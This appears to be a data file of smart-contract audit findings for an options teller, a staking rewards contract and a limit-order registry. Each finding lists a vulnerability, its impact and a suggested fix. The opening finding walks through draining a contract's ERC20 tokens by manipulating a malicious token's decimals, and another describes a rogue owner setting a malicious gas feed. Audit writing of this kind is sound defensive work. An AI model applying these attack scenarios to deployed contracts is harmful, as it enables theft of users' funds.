scenario:\\nLet's suppose the `FixedStrikeOptionTeller` holds some DAI tokens.\\nAn attacker can create a malicious payout token of which he can control the `decimals`.\\nThe attacker calls `deploy` to create an option token with malicious payout token and DAI as quote token and `put` option type\\nMake `payoutToken.decimals` return a large number and call `FixedStrikeOptionTeller.create` with input X. Here `quoteAmount` will be calculated as `0`.\\n```\\n// Calculate amount of quote tokens required to mint\\nuint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n// Transfer quote tokens from user\\n// Check that amount received is not less than amount expected\\n// Handles edge cases like fee-on-transfer tokens (which are not supported)\\nuint256 startBalance = quoteToken.balanceOf(address(this));\\nquoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n```\\n\\nSo 0 DAI will be pulled from the attacker's account but he will receive X option token.\\nMake `payoutToken.decimals` return a small value and call `FixedStrikeOptionTeller.exercise` with X input. Here `quoteAmount` will be calculated as a very high number (which represents number of DAI tokens). So he will receive huge amount of DAI against his X option tokens when exercise the option or when reclaim the token\\n```\\n// Transfer remaining collateral to receiver\\nuint256 amount = optionToken.totalSupply();\\nif (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n} else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n}\\n```\\n\\nHence, the attacker was able to drain all DAI tokens from the `FixedStrikeOptionTeller` contract. 
The same mechanism can be repeated to drain all other ERC20 tokens from the `FixedStrikeOptionTeller` contract by changing the return value of the decimal external callчConsider storing the `payoutToken.decimals` value locally instead of fetching it real-time on all `exercise` or `reclaim` calls.\\nor support payout token and quote token whitelist, if the payout token and quote token are permissionless created, there will always be high riskчAnyone can drain `FixedStrikeOptionTeller` contract of all ERC20 tokens. The cost of attack is negligible (only gas cost).\\nHigh impact, high likelyhood.ч```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n }\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n -Blocklisted address can be used to lock the option token minter's fundчmediumчBlocklisted address can be used to lock the option token minter's fund\\nWhen deploy a token via the teller contract, the contract validate that receiver address is not address(0)\\nHowever, a malicious option token creator can save a seemingly favorable strike price and pick a blocklisted address and set the blocklisted address as receiver\\nSome tokens (e.g. USDC, USDT) have a contract level admin controlled address blocklist. If an address is blocked, then transfers to and from that address are forbidden.\\nMalicious or compromised token owners can trap funds in a contract by adding the contract address to the blocklist. This could potentially be the result of regulatory action against the contract itself, against a single user of the contract (e.g. 
a Uniswap LP), or could also be a part of an extortion attempt against users of the blocked contract.\nthen user would see the favorable strike price and mint the option token using payout token for call option or use quote token for put option\nHowever, they can never exercise their option because the transaction would revert when transferring asset to the receiver for call option and transferring asset to the receiver for put option when exercising the option.\n```\n\n```\n\nthe user's funds that were used to mint the option are lockedчValidate that the receiver is not blacklisted when creating and deploying the option token, or add an expiry check: if after the expiry the receiver does not reclaim the fund, allow the option minter to burn their token in exchange for their fundчBlocklisted receiver address can be used to lock the option token minter's fundч```\n\n```\n -Loss of option token from Teller and reward from OTLM if L2 sequencer goes downчmediumчLoss of option token from Teller and reward from OTLM if L2 sequencer goes down\nIn the current implementation, if the option token expires, the user is not able to exercise the option at strike price\n```\n // Validate that option token is not expired\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\n```\n\nif the option token expires, the user loses rewards from OTLM as well when claiming the reward\n```\n function _claimRewards() internal returns (uint256) {\n // Claims all outstanding rewards for the user across epochs\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\n\n // Get the last epoch claimed by the user\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\n```\n\nand\n```\n // If the option token has expired, then the rewards are zero\n if (uint256(optionToken.expiry()) < block.timestamp) return 0;\n```\n\nAnd in the onchain context, the protocol intends to deploy the contract in arbitrum and 
optimsim\\n```\\nQ: On what chains are the smart contracts going to be deployed?\\nMainnet, Arbitrum, Optimism\\n```\\n\\nHowever, If Arbitrum and optimism layer 2 network, the sequencer is in charge of process the transaction\\nFor example, the recent optimism bedrock upgrade cause the sequencer not able to process transaction for a hew hours\\nBedrock Upgrade According to the official announcement, the upgrade will require 2-4 hours of downtime for OP Mainnet, during which there will be downtime at the chain and infrastructure level while the old sequencer is spun down and the Bedrock sequencer starts up.\\nTransactions, deposits, and withdrawals will also remain unavailable for the duration, and the chain will not be progressing. While the read access across most OP Mainnet nodes will stay online, users may encounter a slight decrease in performance during the migration process.\\nIn Arbitrum\\nArbitrum Goes Down Citing Sequencer Problems Layer 2 Arbitrum suffers 10 hour outage.\\nand\\nEthereum layer-2 (L2) scaling solution Arbitrum stopped processing transactions on June 7 because its sequencer faced a bug in the batch poster. 
The incident only lasted for an hour.\nIf the option expires during the sequencer down time, the user basically has a worthless option token because they cannot exercise the option at strike price\nthe user would lose his reward as option token from OTLM.sol, which defeats the purpose of using OTLM to incentivize users to provide liquidityчchainlink has a sequencer up feed\nconsider integrating the uptime feed and giving users extra time to exercise token and claim option token reward if the sequencer goes downчLoss of option token from Teller and reward from OTLM if L2 sequencer goes downч```\n // Validate that option token is not expired\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\n```\n -User A's staked token balance can be used to mint option token as reward for User B if the payout token equals to the stake tokenчmediumчUser's staked token balance can be used to mint option token as reward if the payout token equals to the stake token, can cause users to lose funds\nIn OTLM, user can stake stakeToken in exchange for the option token minted from the payment token\nwhen staking, we transfer the stakedToken in the OTLM token\n```\n// Increase the user's stake balance and the total balance\nstakeBalance[msg.sender] = userBalance + amount_;\ntotalBalance += amount_;\n\n// Transfer the staked tokens from the user to this contract\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\n```\n\nbefore the stake or unstake or when we are calling claimReward\nwe are calling _claimRewards -> _claimEpochRewards -> we use payout token to mint and create option token as reward\n```\n payoutToken.approve(address(optionTeller), rewards);\n optionTeller.create(optionToken, rewards);\n\n // Transfer rewards to sender\n ERC20(address(optionToken)).safeTransfer(msg.sender, rewards);\n```\n\nthe problem is, if the stake token and the payout token are the same token, the protocol does not distinguish the balance of the 
stake token and the balance of payout token\nsuppose both stake token and payout token are USDC\nsuppose user A stake 100 USDC\nsuppose user B stake 100 USDC\ntime passed, user B accrues 10 token unit reward\nnow user B can claimRewards,\nthe protocol uses 10 USDC to mint option token for B\nthe OTLM has 190 USDC\nif user A and user B both call emergencyUnstakeAll, whoever calls this function later will suffer a revert and he is not able to even give up the reward and claim their staked balance back\nbecause a part of his staked token balance is treated as the payout token to mint option token reward for other userчSeparate the accounting of the staked user and the payout token or check that staked token is not payout token when creating the OTLM.solчIf there are insufficient payout token in the OTLM, the expected behavior is that the transaction revert when claim the reward and when the code use payout token to mint option token\nand in the worst case, user can call emergencyUnstakeAll to get their original staked balance back and give up their reward\nhowever, if the staked token is the same as the payout token,\na part of the user staked token can be mistakenly and constantly mint as option token reward for his own or for other user and eventually when user call emergencyUnstakeAll, there will be insufficient token balance and transaction revert\nso the user will not be able to get their staked token backч```\n// Increase the user's stake balance and the total balance\nstakeBalance[msg.sender] = userBalance + amount_;\ntotalBalance += amount_;\n\n// Transfer the staked tokens from the user to this contract\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\n```\n -IERC20(token).approve revert if the underlying ERC20 token approve does not return booleanчmediumчIERC20(token).approve revert if the underlying ERC20 token approve does not return boolean\nWhen transferring the token, the protocol uses safeTransfer and 
safeTransferFrom\\nbut when approving the payout token, the safeApprove is not used\\nfor non-standard token such as USDT,\\ncalling approve will revert because the solmate ERC20 enforce the underlying token return a boolean\\n```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n\\nwhile the token such as USDT does not return booleanчUse safeApprove instead of approveчUSDT or other ERC20 token that does not return boolean for approve is not supported as the payout tokenч```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n -Division before multiplication result in loss of token reward if the reward update time elapse is smallчmediumчDivision before multiplication result in loss of token reward\\nWhen calcuting the reward, we are calling\\n```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n\\nthe precision loss can be high because the accumulated reward depends on the time elapse:\\n(block.timestamp - lastRewardUpdate)\\nand the REWARD_PERIOD is hardcoded to one days:\\n```\\n /// @notice Amount of time (in seconds) 
that the reward rate is distributed over\\n uint48 public constant REWARD_PERIOD = uint48(1 days);\\n```\\n\\nif the time elapse is short and the currentRewardsPerToken is updated frequently, the precision loss can be heavy and even rounded to zero\\nthe lower the token precision, the heavier the precision loss\\nSome tokens have low decimals (e.g. USDC has 6). Even more extreme, some tokens like Gemini USD only have 2 decimals.\\nconsider as extreme case, if the reward token is Gemini USD, the reward rate is set to 1000 * 10 = 10 ** 4 = 10000\\nif the update reward keep getting called within 8 seconds\\n8 * 10000 / 86400 is already rounded down to zero and no reward is accuring for userчAvoid division before multiplcation and only perform division at lastчDivision before multiplication result in loss of token reward if the reward update time elapse is smallч```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n -FixedStrikeOptionTeller: create can be invoked when block.timestamp == expiry but exercise revertsчmediumчIn `FixedStrikeOptionTeller` contract, new option tokens can be minted when `block.timestamp == expiry` but these option tokens cannot be exercised even in the same transaction.\\nThe `create` function has this statement:\\n```\\n if (uint256(expiry) < block.timestamp) revert Teller_OptionExpired(expiry);\\n```\\n\\nThe 
`exercise` function has this statement:\\n```\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n\\nNotice the `>=` operator which means when `block.timestamp == expiry` the `exercise` function reverts.\\nThe `FixedStrikeOptionTeller.create` function is invoked whenever a user claims his staking rewards using `OTLM.claimRewards` or `OTLM.claimNextEpochRewards`. (here)\\nSo if a user claims his rewards when `block.timestamp == expiry` he receives the freshly minted option tokens but he cannot exercise these option tokens even in the same transaction (or same block).\\nMoreover, since the receiver do not possess these freshly minted option tokens, he cannot `reclaim` them either (assuming `reclaim` function contains the currently missing `optionToken.burn` statement).чConsider maintaining a consistent timestamp behaviour. Either prevent creation of option tokens at expiry or allow them to be exercised at expiry.чOption token will be minted to user but he cannot exercise them. Receiver cannot reclaim them as he doesn't hold that token amount.\\nThis leads to loss of funds as the minted option tokens become useless. 
Also the scenario of users claiming at expiry is not rare.ч```\\n if (uint256(expiry) < block.timestamp) revert Teller_OptionExpired(expiry);\\n```\\n -stake() missing set lastEpochClaimed when userBalance equal 0чmediumчbecause `stake()` don't set `lastEpochClaimed[user] = last epoch` if `userBalance` equal 0 So all new stake user must loop from 0 to `last epoch` for `_claimRewards()` As the epoch gets bigger and bigger it will waste a lot of GAS, which may eventually lead to `GAS_OUT`\\nin `stake()`, when the first-time `stake()` only `rewardsPerTokenClaimed[msg.sender]` but don't set `lastEpochClaimed[msg.sender]`\\n```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n\\nso every new staker , needs claims from 0\\n```\\n function _claimRewards() internal returns (uint256) {\\n // Claims all outstanding rewards for the user across epochs\\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\\n\\n // Get the last epoch claimed by the user\\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\\n\\n // If the last epoch claimed is equal to the current epoch, then only try to claim for the current epoch\\n if (userLastEpoch == epoch) return _claimEpochRewards(epoch);\\n\\n // 
If not, then the user has not claimed all rewards\\n // Start at the last claimed epoch because they may not have completely claimed that epoch\\n uint256 totalRewardsClaimed;\\n for (uint48 i = userLastEpoch; i <= epoch; i++) {\\n // For each epoch that the user has not claimed rewards for, claim the rewards\\n totalRewardsClaimed += _claimEpochRewards(i);\\n }\\n\\n return totalRewardsClaimed;\\n }\\n```\\n\\nWith each new addition of `epoch`, the new stake must consumes a lot of useless loops, from loop 0 to last `epoch` When `epoch` reaches a large size, it will result in GAS_OUT and the method cannot be executedч```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n+ lastEpochClaimed[msg.sender] = epoch;\\n }\\n```\\nчWhen the `epoch` gradually increases, the new take will waste a lot of GAS When it is very large, it will cause GAS_OUTч```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n 
stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n -claimRewards() If a rewards is too small, it may block other epochsчmediumчWhen `claimRewards()`, if some `rewards` is too small after being round down to 0 If `payoutToken` does not support transferring 0, it will block the subsequent epochs\\nThe current formula for calculating rewards per cycle is as follows.\\n```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n\\nCalculate `rewards` formula : uint256 `rewards` = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /10 ** stakedTokenDecimals;\\nWhen `rewardsPerTokenEnd` is very close to `userRewardsClaimed`, `rewards` is likely to be round downs to 0 Some tokens do not support transfer(amount=0) This will revert and lead to can't claimsч```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code..\\n\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n+ if (rewards == 0 ) return 0;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\nчStuck `claimRewards()` when the rewards of an epoch is 0ч```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * 
stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n -Lack of segregation between users' assets and collected fees resulting in loss of funds for the usersчhighчThe users' assets are wrongly sent to the owner due to a lack of segregation between users' assets and collected fees, which might result in an irreversible loss of assets for the victims.\\nGLX uses the Chainlink Automation to execute the `LimitOrderRegistry.performUpkeep` function when there are orders that need to be fulfilled. The `LimitOrderRegistry` contract must be funded with LINK tokens to keep the operation running.\\nTo ensure the LINK tokens are continuously replenished and funded, users must pay a fee denominated in Native ETH or ERC20 WETH tokens on orders claiming as shown below. 
The collected ETH fee will be stored within the `LimitOrderRegistry` contract.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\nTo retrieve the ETH fee collected, the owner will call the `LimitOrderRegistry.withdrawNative` function that will send all the Native ETH and ERC20 WETH tokens within the `LimitOrderRegistry` contract to the owner's address. After executing this function, the Native ETH and ERC20 WETH tokens on this contract will be zero and wiped out.\\n```\\nFile: LimitOrderRegistry.sol\\n function withdrawNative() external onlyOwner {\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n }\\n```\\n\\nMost owners will automate replenishing the `LimitOrderRegistry` contract with LINK tokens to ensure its balance does not fall below zero and for ease of maintenance. 
For instance, a certain percentage of the collected ETH fee (e.g., 50%) will be swapped immediately to LINK tokens on a DEX upon collection and transferred the swapped LINK tokens back to the `LimitOrderRegistry` contract. The remaining will be spent to cover operation and maintenance costs.\\nHowever, the issue is that there are many Uniswap V3 pools where their token pair consists of ETH/WETH. In fact, most large pools in Uniswap V3 will consist of ETH/WETH. For instance, the following Uniswap pools consist of ETH/WETH as one of the pool tokens:\\nUSDC / ETH (0.05% Fee) (TLV: $284 million)\\nWBTC / ETH (0.3% Fee) (TLV: $227 million)\\nUSDC / ETH (0.3% Fee) (TLV: $88 million)\\nDAI / ETH (0.3% Fee) (TLV: $14 million)\\nAssume that the owner has configured and setup the `LimitOrderRegistry` contract to work with the Uniswap DAI/ETH pool, and the current price of the DAI/ETH pool is 1,500 DAI/ETH.\\nBob submit a new Buy Limit Order swapping DAI to ETH at the price of 1,000 DAI/ETH. Bob would deposit 1,000,000 DAI to the `LimitOrderRegistry` contract.\\nWhen Bob's Buy Limit Order is ITM and fulfilled, 1000 ETH/WETH will be sent to and stored within the `LimitOrderRegistry` contract.\\nThe next step that Bob must do to claim the swapped 1000 ETH/WETH is to call the `LimitOrderRegistry.claimOrder` function, which will collect the fee and transfer the swapped 1000 ETH/WETH to Bob.\\nUnfortunately, before Bob could claim his swapped ETH/WETH, the `LimitOrderRegistry.withdrawNative` function is triggered by the owner or the owner's bots. As noted earlier, when the `LimitOrderRegistry.withdrawNative` function is triggered, all the Native ETH and ERC20 WETH tokens on this contract will be transferred to the owner's address. 
As a result, Bob's 1000 swapped ETH/WETH stored within the `LimitOrderRegistry` contract are sent to the owner's address, and the balance of ETH/WETH in the `LimitOrderRegistry` contract is zero.\\nWhen Bob calls the `LimitOrderRegistry.claimOrder` function, the transaction will revert because insufficient ETH/WETH is left in the `LimitOrderRegistry` contract.\\nUnfortunately for Bob, there is no way to recover back his ETH/WETH that is sent to the owner's address. Following outline some of the possible scenarios where this could happen:\\nThe owners set up their infrastructure to automatically swap a portion or all the ETH/WETH received to LINK tokens and transfer them to the `LimitOrderRegistry` contract, and there is no way to retrieve the deposited LINK tokens from the `LimitOrderRegistry` contract even if the owner wishes to do so as there is no function within the contract to allow this action.\\nThe owners set up their infrastructure to automatically swap a small portion of ETH/WETH received to LINK tokens and send the rest of the ETH/WETH to 100 investors/DAO members' addresses. So, it is no guarantee that the investors/DAO members will return the ETH/WETH to Bob.чConsider implementing one of the following solutions to mitigate the issue:\\nSolution 1 - Only accept Native ETH as fee\\nUniswap V3 pool stored ETH as Wrapped ETH (WETH) ERC20 token internally. When the `collect` function is called against the pool, WETH ERC20 tokens are returned to the caller. 
Thus, the most straightforward way to mitigate this issue is to update the contract to `collect` the fee in Native ETH only.\\nIn this case, there will be a clear segregation between users' assets (WETH) and owner's fee (Native ETH)\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure there is something to withdraw.\\n// Remove the line below\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n// Add the line below\\n if (nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n// Remove the line below\\n // transfer wrappedNativeBalance if it exists\\n// Remove the line below\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\n\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value // Remove the line below\\n userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund); \\n } else {\\n// Remove the line below\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n// Remove the line below\\n // If value is non zero send it back to caller.\\n// Remove the line below\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n// Add the line below\\n revert LimitOrderRegistry__InsufficientFee;\\n }\\n..SNIP..\\n```\\n\\nSolution 2 - Define state variables to keep track of the collected fee\\nConsider defining state variables to keep track of the 
collected fee so that the fee will not mix up with users' assets.\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n// Add the line below\\n collectedNativeETHFee // Add the line below\\n= userClaim.feePerUser\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n// Add the line below\\n collectedWETHFee // Add the line below\\n= userClaim.feePerUser\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n// Remove the line below\\n uint256 nativeBalance = address(this).balance;\\n// Add the line below\\n uint256 wrappedNativeBalance = collectedWETHFee;\\n// Add the line below\\n uint256 nativeBalance = collectedNativeETHFee;\\n// Add the line below\\n collectedWETHFee = 0; // clear the fee\\n// Add the line below\\n collectedNativeETHFee = 0; // clear the fee\\n // Make sure there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\nчLoss of assets for the usersч```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n 
tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n -Users' funds could be stolen or locked by malicious or rogue ownersчhighчUsers' funds could be stolen or locked by malicious or rogue owners.\\nIn the contest's README, the following was mentioned.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nrestricted. the owner should not be able to steal funds.\\nIt was understood that the owner is not \"trusted\" and should not be able to steal funds. Thus, it is fair to assume that the sponsor is keen to know if there are vulnerabilities that could allow the owner to steal funds or, to a lesser extent, lock the user's funds.\\nMany control measures are implemented within the protocol to prevent the owner from stealing or locking the user's funds.\\nHowever, based on the review of the codebase, there are still some \"loopholes\" that the owner can exploit to steal funds or indirectly cause losses to the users. Following is a list of methods/tricks to do so.\\nMethod 1 - Use the vulnerable `withdrawNative` function\\nOnce the user's order is fulfilled, the swapped ETH/WETH will be sent to the contract awaiting the user's claim. 
However, the owner can call the `withdrawNative` function, which will forward all the Native ETH and Wrapped ETH in the contract to the owner's address due to another bug (\"Lack of segregation between users' assets and collected fees resulting in loss of funds for the users\") that I highlighted in another of my report.\\nMethod 2 - Add a malicious custom price feed\\n```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n\\nThe owner can create a malicious price feed contract and configure the `LimitOrderRegistry` to use it by calling the `setFastGasFeed` function.\\n```\\nFile: LimitOrderRegistry.sol\\n function performUpkeep(bytes calldata performData) external {\\n (UniswapV3Pool pool, bool walkDirection, uint256 deadline) = abi.decode(\\n performData,\\n (UniswapV3Pool, bool, uint256)\\n );\\n\\n if (address(poolToData[pool].token0) == address(0)) revert LimitOrderRegistry__PoolNotSetup(address(pool));\\n\\n PoolData storage data = poolToData[pool];\\n\\n // Estimate gas cost.\\n uint256 estimatedFee = uint256(upkeepGasLimit * getGasPrice());\\n```\\n\\nWhen fulfilling an order, the `getGasPrice()` function will fetch the gas price from the malicious price feed that will report an extremely high price (e.g., 100000 ETH), causing the `estimatedFee` to be extremely high. When users attempt to claim the order, they will be forced to pay an outrageous fee, which the users cannot afford to do so. Thus, the users have to forfeit their orders, and they will lose their swapped tokens.чConsider implementing the following measures to reduce the risk of malicious/rogue owners from stealing or locking the user's funds.\\nTo mitigate the issue caused by the vulnerable `withdrawNative` function. 
Refer to my recommendation in my report titled \"Lack of segregation between users' assets and collected fees resulting in loss of funds for the users\".\\nTo mitigate the issue of the owner adding a malicious custom price feed, consider performing some sanity checks against the value returned from the price feed. For instance, it should not be larger than the `MAX_GAS_PRICE` constant. If it is larger than `MAX_GAS_PRICE` constant, fallback to the user-defined gas feed, which is constrained to be less than `MAX_GAS_PRICE`.чUsers' funds could be stolen or locked by malicious or rogue owners.ч```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n -Owners will incur loss and bad debt if the value of a token crashesчmediumчIf the value of the swapped tokens crash, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n\\nUsers only need to pay for the gas 